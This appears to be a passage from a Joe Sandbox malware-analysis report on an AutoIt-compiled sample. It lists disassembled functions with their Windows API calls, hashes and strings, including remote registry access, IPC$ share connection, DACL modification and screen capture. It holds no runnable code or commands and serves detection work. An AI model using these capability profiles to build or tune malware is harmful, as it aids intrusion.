                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                                                              • String ID: :$\$\??\%s
                                                                                                                                                                              • API String ID: 2733774712-3457252023
                                                                                                                                                                              • Opcode ID: e83d726eb1a8284ab98aba64368967b4a2ceee9f1c7fa14d6286a3586948e49f
                                                                                                                                                                              • Instruction ID: d9a7e391e1c64afbccb4ed3cf81b14e8f87803592e1b1f3c0ae738b7e864f8b5
                                                                                                                                                                              • Opcode Fuzzy Hash: e83d726eb1a8284ab98aba64368967b4a2ceee9f1c7fa14d6286a3586948e49f
                                                                                                                                                                              • Instruction Fuzzy Hash: FB31C87290020CABDB20DFA4DC49FEB77BDBF94704F0081A6F615D2260E7749A45DBA5
                                                                                                                                                                              Function 0051E541 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0051BD04,?,?), ref: 0051E564
                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0051BD04,?,?,00000000,?), ref: 0051E57B
                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0051BD04,?,?,00000000,?), ref: 0051E586
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,0051BD04,?,?,00000000,?), ref: 0051E593
                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0051E59C
                                                                                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0051BD04,?,?,00000000,?), ref: 0051E5AB
                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0051E5B4
                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,0051BD04,?,?,00000000,?), ref: 0051E5BB
                                                                                                                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0051BD04,?,?,00000000,?), ref: 0051E5CC
                                                                                                                                                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,0053D9BC,?), ref: 0051E5E5
                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 0051E5F5
                                                                                                                                                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 0051E619
                                                                                                                                                                              • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0051E644
                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 0051E66C
                                                                                                                                                                              • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0051E682
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3840717409-0
                                                                                                                                                                              • Opcode ID: 292146e9dee5a22f2b2909a64a5fdee3d98ec28c9d66b45ad5069f73f546928f
                                                                                                                                                                              • Instruction ID: 9844af0016f166d0c7f53f5b2eb47698fa0d1f85027bcf7366b8d65e5ac73891
                                                                                                                                                                              • Opcode Fuzzy Hash: 292146e9dee5a22f2b2909a64a5fdee3d98ec28c9d66b45ad5069f73f546928f
                                                                                                                                                                              • Instruction Fuzzy Hash: 9B414775600208AFDB119F64EC89EAFBBB9FF99715F108058F906D7260D731AD45EB20
                                                                                                                                                                              Function 00500B20 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • __wsplitpath.LIBCMT ref: 00500C93
                                                                                                                                                                              • _wcscat.LIBCMT ref: 00500CAB
                                                                                                                                                                              • _wcscat.LIBCMT ref: 00500CBD
                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00500CD2
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00500CE6
                                                                                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00500CFE
                                                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00500D18
                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00500D2A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                                                                              • String ID: *.*
                                                                                                                                                                              • API String ID: 34673085-438819550
                                                                                                                                                                              • Opcode ID: 446aa8006cd8d7c02c663b75639496ed2983c8c9862082792247e06ffbc4bee0
                                                                                                                                                                              • Instruction ID: 9035e5c7dffc336b79db0604b6360ec0ec818193cfb9a5fa56a7e9de0bb77dc9
                                                                                                                                                                              • Opcode Fuzzy Hash: 446aa8006cd8d7c02c663b75639496ed2983c8c9862082792247e06ffbc4bee0
                                                                                                                                                                              • Instruction Fuzzy Hash: 608181715042059FD764DF64C844AAEBBE8BB89314F189D2EF885C72D1EA34DD84CBA2
                                                                                                                                                                              Function 0051ECBC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                                                                                                                                              • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0051ED0C
                                                                                                                                                                              • GetFocus.USER32 ref: 0051ED1C
                                                                                                                                                                              • GetDlgCtrlID.USER32(00000000), ref: 0051ED27
                                                                                                                                                                              • _memset.LIBCMT ref: 0051EE52
                                                                                                                                                                              • GetMenuItemInfoW.USER32 ref: 0051EE7D
                                                                                                                                                                              • GetMenuItemCount.USER32(00000000), ref: 0051EE9D
                                                                                                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 0051EEB0
                                                                                                                                                                              • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0051EEE4
                                                                                                                                                                              • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0051EF2C
                                                                                                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0051EF64
                                                                                                                                                                              • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0051EF99
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                                                                              • String ID: 0
                                                                                                                                                                              • API String ID: 1296962147-4108050209
                                                                                                                                                                              • Opcode ID: 9106c1a5e134b7fc79e0773c369a2489426f5baeb659b612221beb0c95dbcdff
                                                                                                                                                                              • Instruction ID: fc0c89bb79763194f44f03b9075f4fec71f3e5c450f0f9ab50927dedab0653a5
                                                                                                                                                                              • Opcode Fuzzy Hash: 9106c1a5e134b7fc79e0773c369a2489426f5baeb659b612221beb0c95dbcdff
                                                                                                                                                                              • Instruction Fuzzy Hash: A6818D71108301AFEB10DF14D886AABBFE8FB88354F04492DFD9997291D730D985DBA2
                                                                                                                                                                              Function 004EB593 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004EB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 004EB903
                                                                                                                                                                                • Part of subcall function 004EB8E7: GetLastError.KERNEL32(?,004EB3CB,?,?,?), ref: 004EB90D
                                                                                                                                                                                • Part of subcall function 004EB8E7: GetProcessHeap.KERNEL32(00000008,?,?,004EB3CB,?,?,?), ref: 004EB91C
                                                                                                                                                                                • Part of subcall function 004EB8E7: HeapAlloc.KERNEL32(00000000,?,004EB3CB,?,?,?), ref: 004EB923
                                                                                                                                                                                • Part of subcall function 004EB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 004EB93A
                                                                                                                                                                                • Part of subcall function 004EB982: GetProcessHeap.KERNEL32(00000008,004EB3E1,00000000,00000000,?,004EB3E1,?), ref: 004EB98E
                                                                                                                                                                                • Part of subcall function 004EB982: HeapAlloc.KERNEL32(00000000,?,004EB3E1,?), ref: 004EB995
                                                                                                                                                                                • Part of subcall function 004EB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,004EB3E1,?), ref: 004EB9A6
                                                                                                                                                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004EB5F7
                                                                                                                                                                              • _memset.LIBCMT ref: 004EB60C
                                                                                                                                                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004EB62B
                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 004EB63C
                                                                                                                                                                              • GetAce.ADVAPI32(?,00000000,?), ref: 004EB679
                                                                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004EB695
                                                                                                                                                                              • GetLengthSid.ADVAPI32(?), ref: 004EB6B2
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 004EB6C1
                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004EB6C8
                                                                                                                                                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 004EB6E9
                                                                                                                                                                              • CopySid.ADVAPI32(00000000), ref: 004EB6F0
                                                                                                                                                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004EB721
                                                                                                                                                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004EB747
                                                                                                                                                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004EB75B
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3996160137-0
                                                                                                                                                                              • Opcode ID: a480877c8b018204c1516521db1a858807e847d232d87a5525266c8ee9a78e8c
                                                                                                                                                                              • Instruction ID: 6c84a5bc43e2417e83d153ee0013836f26020c2d9307601bb530120de56e279d
                                                                                                                                                                              • Opcode Fuzzy Hash: a480877c8b018204c1516521db1a858807e847d232d87a5525266c8ee9a78e8c
                                                                                                                                                                              • Instruction Fuzzy Hash: 05517D71900249ABCF049FA2DC89EEFBB79FF44745F04811AF911A6390D7349A05DBA4
                                                                                                                                                                              Function 0050A268 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetDC.USER32(00000000), ref: 0050A2DD
                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0050A2E9
                                                                                                                                                                              • CreateCompatibleDC.GDI32(?), ref: 0050A2F5
                                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 0050A302
                                                                                                                                                                              • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0050A356
                                                                                                                                                                              • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 0050A392
                                                                                                                                                                              • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0050A3B6
                                                                                                                                                                              • SelectObject.GDI32(00000006,?), ref: 0050A3BE
                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0050A3C7
                                                                                                                                                                              • DeleteDC.GDI32(00000006), ref: 0050A3CE
                                                                                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 0050A3D9
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                              • String ID: (
                                                                                                                                                                              • API String ID: 2598888154-3887548279
                                                                                                                                                                              • Opcode ID: 18eb28e15770083e16362202e91e496a774dadeed44fa7350913f61581d588f5
                                                                                                                                                                              • Instruction ID: ba8d197274adda968f6d601194e2de804e3aa196826ba52a737fcee9ad67b098
                                                                                                                                                                              • Opcode Fuzzy Hash: 18eb28e15770083e16362202e91e496a774dadeed44fa7350913f61581d588f5
                                                                                                                                                                              • Instruction Fuzzy Hash: 65513875900309AFCB15CFA8D885AAEBBB9FF48710F14881DF95AA7350D731A945CB60
                                                                                                                                                                              Function 00513AF7 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00512AA6,?,?), ref: 00513B0E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: BuffCharUpper
                                                                                                                                                                              • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU$|EV
                                                                                                                                                                              • API String ID: 3964851224-1416026000
                                                                                                                                                                              • Opcode ID: f03169bd846b2f04c771ebc353d8daa5588d60e4df821bfb6110aaed72cf85fc
                                                                                                                                                                              • Instruction ID: 876a9b93500ca7c123cbfc64231aa2e6786a13f7f900c73cedafc0b3a615c94b
                                                                                                                                                                              • Opcode Fuzzy Hash: f03169bd846b2f04c771ebc353d8daa5588d60e4df821bfb6110aaed72cf85fc
                                                                                                                                                                              • Instruction Fuzzy Hash: 3F41A5341002468BEF04EF04D860BEA3B62BF2539CF54482DFC525B295DB389E89CBA4
                                                                                                                                                                              Function 004F32B0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 72windowCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00523C64,00000010,00000000,Bad directive syntax error,0054DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 004F32D1
                                                                                                                                                                              • LoadStringW.USER32(00000000,?,00523C64,00000010), ref: 004F32D8
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                              • _wprintf.LIBCMT ref: 004F3309
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004F332B
                                                                                                                                                                              • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004F3395
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:$"W
                                                                                                                                                                              • API String ID: 1506413516-1713381306
                                                                                                                                                                              • Opcode ID: 04cc3f03647bddf45d2c98911af6dec9409b4a3713002e1750deab5543e2a6f5
                                                                                                                                                                              • Instruction ID: ea72c2f0fbeaa3913db87984497da93f9aa006f781ebda5892f86f018ddd4982
                                                                                                                                                                              • Opcode Fuzzy Hash: 04cc3f03647bddf45d2c98911af6dec9409b4a3713002e1750deab5543e2a6f5
                                                                                                                                                                              • Instruction Fuzzy Hash: F621A03190021DBBCF01EFD1CC06EEE7B35BF24705F00085BF505A11A1DAB9AA58DB64
                                                                                                                                                                              Function 004FD520 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 144COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadStringW.USER32(00000066,?,00000FFF), ref: 004FD567
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                              • LoadStringW.USER32(?,?,00000FFF,?), ref: 004FD589
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004FD5DC
                                                                                                                                                                              • _wprintf.LIBCMT ref: 004FD68D
                                                                                                                                                                              • _wprintf.LIBCMT ref: 004FD6AB
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                              • API String ID: 2116804098-2391861430
                                                                                                                                                                              • Opcode ID: ed96821b0b2fedc3ff567e0c0af2d8595de500f74a6ea5b8139e18acac510cbf
                                                                                                                                                                              • Instruction ID: 296fd86f560bed7cfbee55c745fbd70667b89e5c0f1c50c0e28b4e98c100acc7
                                                                                                                                                                              • Opcode Fuzzy Hash: ed96821b0b2fedc3ff567e0c0af2d8595de500f74a6ea5b8139e18acac510cbf
                                                                                                                                                                              • Instruction Fuzzy Hash: 3651D471D00109BBCB14EBA1DD86EEEB779AF14308F10445BF205A21A1DA796F48EB68
                                                                                                                                                                              Function 004FD338 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 140COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 004FD37F
                                                                                                                                                                                • Part of subcall function 004BCAEE: _memmove.LIBCMT ref: 004BCB2F
                                                                                                                                                                              • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 004FD3A0
                                                                                                                                                                              • __swprintf.LIBCMT ref: 004FD3F3
                                                                                                                                                                              • _wprintf.LIBCMT ref: 004FD499
                                                                                                                                                                              • _wprintf.LIBCMT ref: 004FD4B7
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                                              • API String ID: 2116804098-3420473620
                                                                                                                                                                              • Opcode ID: 9ad648167fd37b10ebd7c60ac04122bdc6d5683eea3148a2fcb0fe3a46cb5bfd
                                                                                                                                                                              • Instruction ID: a6eed8346f16f404621c33b3109ea6ae0accaa01bc89546603a4caaa67d7da3e
                                                                                                                                                                              • Opcode Fuzzy Hash: 9ad648167fd37b10ebd7c60ac04122bdc6d5683eea3148a2fcb0fe3a46cb5bfd
                                                                                                                                                                              • Instruction Fuzzy Hash: 2E51E271D00108BBCB14FBA1DD86EEEB779AF14309F10445BF205B21A1EA796F48EB64
                                                                                                                                                                              Function 004EAEE5 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 127registryshareCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
                                                                                                                                                                              • _memset.LIBCMT ref: 004EAF74
                                                                                                                                                                              • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004EAFA9
                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 004EAFC5
                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 004EAFE1
                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 004EB00B
                                                                                                                                                                              • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 004EB033
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004EB03E
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 004EB043
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                                                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                                                              • API String ID: 1411258926-22481851
                                                                                                                                                                              • Opcode ID: 2285d2bed4bf21d1020b51e51f12df130110a4a3339addeeed7f8a21a2b362ba
                                                                                                                                                                              • Instruction ID: c3e5335a9692f599a159f9eda1c3c0386021189c8e8914a41ca718cc566b8207
